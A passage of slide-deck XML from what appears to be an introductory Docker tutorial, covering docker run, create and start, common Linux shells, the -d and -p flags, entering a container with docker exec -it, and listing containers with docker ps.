            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container create</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container start</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker run = docker pull + docker create + docker start</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="359650"/>
            <a:ext cx="8520600" cy="70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3559">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of Linux Shells</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1476" name="Google Shape;1476;p2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38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bourne Again Shell (bash)   ubuntu (Mostly Used)   /bin/bash</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="274E13"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bourne Shell (sh)                Alpine                 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/sh</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="274E13"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C Shell (csh)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="274E13"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TENEX C Shell (tcsh)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="274E13"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KornShell (ksh)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="274E13"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian Almquist Shell (dash)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="274E13"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Z Shell (zsh)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="274E13"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Friendly Interactive Shell (fish)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="21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3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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3734">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run the Container</a:t>
            </a:r>
            <a:endParaRPr sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1482" name="Google Shape;1482;p238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="1152475"/>
            <a:ext cx="8187000" cy="3558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2150">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2150">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run &lt;flags&gt; &lt;containerName&gt;  &lt;shell&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2150">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2150">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -dp 80:80 myimage</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-d = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> flag to run the container in detached mode (background service)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>-p = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t>-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> flag is used to open the port of application</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3334">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go inside the running container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1488" name="Google Shape;1488;p239"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8235600" cy="3632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b="1" lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1550">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container exec &lt;flag&gt; &lt;containerId/contName&gt; &lt;shell&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker exec &lt;flag&gt; &lt;containerId&gt; &lt;shell&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1550">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker exec -it  #283aas9878a  /bin/bash</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-i = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t>--interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t>-i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> flag to indicate that the container’s </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t>STDIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> should be opened.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>-t = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F5"/>
                </a:highlight>
              </a:rPr>
              <a:t>-t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> flag to allocate a psuedo-TTY to be able to run interactive commands</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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25000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listing All Running Containers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1494" name="Google Shape;1494;p240"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="24603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0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container ps</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker ps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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25000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="34920"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listing All (Stopped or Started) Containers</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1500" name="Google Shape;1500;p241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
